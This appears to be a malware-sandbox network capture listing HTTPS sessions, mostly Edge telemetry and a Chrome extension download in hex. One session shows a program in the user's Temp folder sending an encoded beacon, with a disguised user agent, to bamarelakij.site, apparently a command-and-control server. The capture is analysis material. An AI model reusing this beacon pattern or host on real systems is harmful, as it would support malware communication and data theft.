                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:42:40 GMT
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                14192.168.2.75006240.79.167.84437832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:42:41 UTC1043OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430159327&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Content-Length: 5379
                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                Accept: */*
                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                Cookie: USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1; msnup=; _C_ETH=1
                                                                                                                                                                2025-01-09 13:42:41 UTC5379OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 34 32 3a 33 39 2e 33 32 36 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 62 38 36 38 34 39 38 34 2d 37 64 32 34 2d 34 65 38 34 2d 62 61 66 61 2d 62 31 39 30 39 63 61 65 66 31 66 32 22 2c 22 65 70 6f 63 68 22 3a 22 32 34 30 33 31 39 35 39 31 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-09T13:42:39.326Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"b8684984-7d24-4e84-bafa-b1909caef1f2","epoch":"240319591"},"app":{"locale"
                                                                                                                                                                2025-01-09 13:42:41 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                Set-Cookie: MC1=GUID=2fb6ae680c174bb99eef245e38a9b657&HASH=2fb6&LV=202501&V=4&LU=1736430161556; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:42:41 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                Set-Cookie: MS0=2f3b6c8e83e2424cb792b26c5301b4c2; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:12:41 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                time-delta-millis: 2229
                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:42:41 GMT
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                15192.168.2.750065104.21.80.524433824C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:42:41 UTC434OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept: */*
                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
                                                                                                                                                                Content-Length: 53
                                                                                                                                                                Host: bamarelakij.site
                                                                                                                                                                2025-01-09 13:42:41 UTC53OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 03 00 00 00 00 02 00 00 00 fe ff ff ff 00 00 00 00 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                Data Ascii:
                                                                                                                                                                2025-01-09 13:42:41 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:42:41 GMT
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LTW%2Bzjkj58aD7fH790HomqpPkz9Ee1c4pE3M1K8VFKZuepXIimwWqlrC4PfzuvnEsj1SEU9g6fE%2F2ayhNLuAYVoILyew65yaObO9ShglkEWlNSmRaZeEDzK1j0Y9XWiUsScy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8ff4da1dced17c96-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1816&min_rtt=1805&rtt_var=699&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1123&delivery_rate=1542525&cwnd=173&unsent_bytes=0&cid=f6d00d9befc69026&ts=345&x=0"
                                                                                                                                                                2025-01-09 13:42:41 UTC29INData Raw: 31 37 0d 0a 00 00 00 00 07 00 00 00 fe ff ff ff 00 00 00 00 91 91 ce 09 b6 a6 61 0d 0a
                                                                                                                                                                Data Ascii: 17a
                                                                                                                                                                2025-01-09 13:42:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                16192.168.2.75006440.79.167.84437832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:42:41 UTC1043OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430159570&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Content-Length: 9880
                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                Accept: */*
                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                Cookie: USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1; msnup=; _C_ETH=1
                                                                                                                                                                2025-01-09 13:42:41 UTC9880OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 34 32 3a 33 39 2e 35 36 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 62 38 36 38 34 39 38 34 2d 37 64 32 34 2d 34 65 38 34 2d 62 61 66 61 2d 62 31 39 30 39 63 61 65 66 31 66 32 22 2c 22 65 70 6f 63 68 22 3a 22 32 34 30 33 31 39 35 39 31 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61
                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-09T13:42:39.569Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"b8684984-7d24-4e84-bafa-b1909caef1f2","epoch":"240319591"},"app":{"loca
                                                                                                                                                                2025-01-09 13:42:41 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                Set-Cookie: MC1=GUID=4364e2c6231f4e6f83c9878c7f6c0c45&HASH=4364&LV=202501&V=4&LU=1736430161821; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:42:41 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                Set-Cookie: MS0=288c128b4bc24c9fa10b6a74d1dcc6b6; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:12:41 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                time-delta-millis: 2251
                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:42:41 GMT
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                17192.168.2.750080142.250.65.1614437832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:42:51 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                Host: clients2.googleusercontent.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                2025-01-09 13:42:51 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                Content-Length: 154477
                                                                                                                                                                X-GUploader-UploadID: AFiumC7I3mLFKPuqKq0QgTIrXmnqueHQVirH7f30b_yzeXj-yf0rCz3uucMObn1KuaKBemJZz3D071g
                                                                                                                                                                X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Date: Thu, 09 Jan 2025 12:51:14 GMT
                                                                                                                                                                Expires: Fri, 09 Jan 2026 12:51:14 GMT
                                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                                Age: 3097
                                                                                                                                                                Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                Content-Type: application/x-chrome-extension
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close
                                                                                                                                                                2025-01-09 13:42:51 UTC821INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                2025-01-09 13:42:51 UTC1390INData Raw: b5 fc 3c 0f e3 f9 d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72
                                                                                                                                                                Data Ascii: <Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr
                                                                                                                                                                2025-01-09 13:42:51 UTC1390INData Raw: 78 c3 9a 50 64 5d fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd
                                                                                                                                                                Data Ascii: xPd]@uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[u
                                                                                                                                                                2025-01-09 13:42:51 UTC1390INData Raw: e1 6d c0 c8 18 51 ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd
                                                                                                                                                                Data Ascii: mQVkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iG
                                                                                                                                                                2025-01-09 13:42:51 UTC1390INData Raw: c3 10 d6 1f b2 cd fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a
                                                                                                                                                                Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                2025-01-09 13:42:51 UTC1390INData Raw: ad 00 5e b3 4e cb 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7
                                                                                                                                                                Data Ascii: ^Ns=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>
                                                                                                                                                                2025-01-09 13:42:51 UTC1390INData Raw: a5 20 e7 31 76 b4 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67
                                                                                                                                                                Data Ascii: 1v=K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g
                                                                                                                                                                2025-01-09 13:42:51 UTC1390INData Raw: 02 c0 b2 db c0 47 fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6
                                                                                                                                                                Data Ascii: GfO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F
                                                                                                                                                                2025-01-09 13:42:51 UTC1390INData Raw: 08 3f f4 d3 de f8 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31
                                                                                                                                                                Data Ascii: ?AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1
